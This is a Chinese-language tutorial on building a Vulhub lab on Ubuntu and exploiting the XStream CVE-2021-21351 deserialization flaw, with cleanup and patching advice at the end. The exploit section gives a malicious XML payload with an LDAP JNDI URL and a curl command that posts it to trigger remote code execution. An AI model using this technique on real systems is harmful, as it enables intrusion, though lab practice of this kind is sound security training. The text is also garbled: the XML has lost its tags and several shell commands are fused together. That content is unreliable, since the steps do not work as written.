Ubuntu下Vulhub靶场搭建与实战（xstream CVE-2021-21351漏洞利用教程）

二、安装Docker与Docker-compose

首先，更新系统并安装Docker。打开终端，执行以下命令：

    sudo apt updatesudo apt install docker.io docker-compose -ysudo systemctl start dockersudo systemctl enable docker  

验证安装：运行 docker --version 和 docker-compose --version，确保显示版本信息。

三、下载与搭建Vulhub靶场

Vulhub提供了多个漏洞环境，包括xstream的CVE-2021-21351。下载Vulhub到本地：

    git clone https://github.com/vulhub/vulhub.gitcd vulhub  

进入xstream漏洞目录：

    cd xstream/CVE-2021-21351  

启动漏洞环境：

    docker-compose up -d  

等待镜像拉取和容器启动。使用 docker ps 检查容器状态，确保运行正常。

四、利用CVE-2021-21351漏洞

漏洞环境运行在本地8080端口。首先，创建一个恶意XML文件 exploit.xml，内容如下：

                  2        3          ysomap              ldap://localhost:1389/Exploit                    ysomap                        test                      

然后，使用curl发送恶意请求到靶场：

    curl -X POST http://localhost:8080 -H "Content-Type: application/xml" --data-binary @exploit.xml  

如果配置正确，这将触发远程代码执行。注意：这仅用于教育目的，请在隔离环境中测试。

五、清理与安全建议

测试完成后，停止并删除容器：

    docker-compose down  

为了防护此类漏洞，建议及时更新xstream库到安全版本，并对输入数据进行严格验证。通过Ubuntu上的Vulhub靶场练习，你可以深入理解xstream的CVE-2021-21351漏洞机制，提升安全技能。

本教程涵盖了从环境搭建到漏洞利用的全过程。记住，实战是学习网络安全的最佳方式，但务必遵守法律法规。